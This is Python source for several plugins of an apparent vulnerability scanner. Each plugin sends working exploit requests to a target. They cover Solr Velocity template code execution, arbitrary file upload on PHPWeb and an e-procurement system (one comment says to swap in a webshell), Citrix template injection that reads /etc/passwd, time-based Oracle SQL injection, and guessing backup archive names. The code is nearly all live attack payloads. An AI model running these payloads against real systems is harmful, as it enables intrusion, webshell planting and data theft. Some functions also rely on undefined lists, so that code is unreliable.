def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' payload_url1 = scheme + "://" + url + ":" + str(port) + payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" headers1 = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', } resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text cod2 = resp2.status_code if con2.find("uid=") != -1 and con2.find( "groups=") != -1 and con2.find( "gid=") != -1 and cod2 == 200: Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload1 = "/base/post.php" payload_url1 = url + payload1 dada = "act=appcode" payload2 = "/base/appfile.php" payload_url2 = url + payload2 ran = ClassCongregation.randoms().result(10) payload_url3 = url + "/effect/source/bg/{}.txt".format(ran) Headers1 = Headers Headers2 = Headers Headers1['Accept'] = '*/*' Headers1['Content-Type'] = 'application/x-www-form-urlencoded' Headers2['Accept'] = '*/*' Headers2[ 'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE' resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=Headers1, timeout=5, verify=False) con = resp.text k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值 md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest() dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en) resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=Headers2, timeout=5, verify=False) resp3 = requests.get(payload_url3, headers=Headers1, proxies=proxies, timeout=5, verify=False) code3 = resp3.status_code con3 = resp3.text if code3 == 200 and con3.find(ran) != -1: Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp3, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/library/editornew/Editor/img_save.asp" payload_url = scheme + "://" + url + ":" + str(port) + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- ''' headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find("testvul") != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/vpn/../vpns/portal/scripts/newbm.pl" payload_url = scheme + "://" + url + ":" + str(port) + payload randoms = rand() try: headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, "Connection": "close", "NSC_USER": "******".format(randoms), "NSC_NONCE": "nsroot" } data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format( randoms) resp = requests.post(payload_url, data=data, headers=headers, timeout=5, verify=False, allow_redirects=False) con = resp.text code = resp.status_code if code == 200 and con.find("parent.window.ns_reload") != -1: payload_url2 = scheme + "://" + url + ":" + str( port) + '/vpn/../vpns/portal/{}.xml'.format(randoms) headers2 = { "NSC_USER": "******", "NSC_NONCE": "nsroot", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0", 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, } resp2 = requests.get(payload_url2, headers=headers2, timeout=5, verify=False) con2 = resp2.text code2 = resp2.status_code if code2 == 200 and con2.find("root:") != -1 and con2.find( "bin:") != -1 and con2.find("/root") != -1: Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format( url, payload_url2, data, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 # if __name__ == '__main__': # # with open(r'../123.txt', 'r') as file: # content_lists = file.readlines() # url = [x.strip() for x in content_lists] # for l in url: # medusa(l) #medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port urls = [ '/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1', '/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1', '/Price/SuggestList.aspx?priceid=1', '/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1', '/Products/Category/CategoryOption.aspx?option=IsStop&classId=1', '/Products/Tiens/CategoryStockView.aspx?id=1', '/custom/CompanyCGList.aspx?ComId=1', '/SuperMarket/InterestInfoDetail.aspx?ItemId=1', '/Orders/k3orderdetail.aspx?FINTERID=1', '/custom/GroupNewsList.aspx?child=true&groupId=121' ] payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)" payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)" for payload in urls: try: payload_url = scheme + "://" + url + ":" + str( port) + payload + payload1 payload_url2 = scheme + "://" + url + ":" + str( port) + payload + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() time0 = time.time() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) time1 = time.time() resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) time2 = time.time() con = resp.text code = resp.status_code code2 = resp2.status_code if code2 != 0 and code != 0 and ((time1 - time0) - (time2 - time1)) > 4: Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format( url, con, payload_url) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 Medusas=[] Medusa = "{} 存在敏感文件压缩下载漏洞\r\n漏洞详情:\r\nPayload:".format(url) Medusas.append(str(Medusa)) #构建特殊Payload并发送到SpecialPayload中 colon_payload = "" unsigned_payload = "" point_payload = "" underline_payload = "" expansion_number_payload = "" url_str_list = url.split(".") for url_str in url_str_list: colon_payload = colon_payload + url_str + ":" for url_str in url_str_list: unsigned_payload = unsigned_payload + url_str for url_str in url_str_list: point_payload = point_payload + url_str + "." for url_str in url_str_list: underline_payload = underline_payload + url_str + "_" for url_str in url_str_list: expansion_number_payload = expansion_number_payload + url_str + "-" payloads.append(str("/"+colon_payload[:-1])) payloads.append(str("/"+unsigned_payload)) payloads.append(str("/"+point_payload[:-1])) payloads.append(str("/"+underline_payload[:-1])) payloads.append(str("/"+expansion_number_payload[:-1])) for payload in payloads: for suffix in suffixs: try: payload_url = scheme+"://"+url+payload+suffix headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp!=None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp==None: resp = requests.head(payload_url,headers=headers, timeout=5, verify=False) resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code==200 and (resp2.headers["Content-Type"] == "application/zip" or resp2.headers["Content-Type"] == "application/x-rar-compressed" or resp2.headers["Content-Type"] == "application/x-gzip" or resp2.headers["Content-Type"] == "application/gzip") : Medusa="{}\r\n".format(payload_url) Medusas.append(str(Medusa)) except Exception as e: pass for Special in SpecialPayload: try: payload_url = scheme + "://" + url + Special headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } # s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = requests.head(payload_url, headers=headers, timeout=5, verify=False) resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and resp2.headers["Content-Type"] == "text/plain": Medusa = "{}\r\n".format(payload_url) Medusas.append(str(Medusa)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) try: for i in Medusas: Medusa=Medusa+i return Medusas except: pass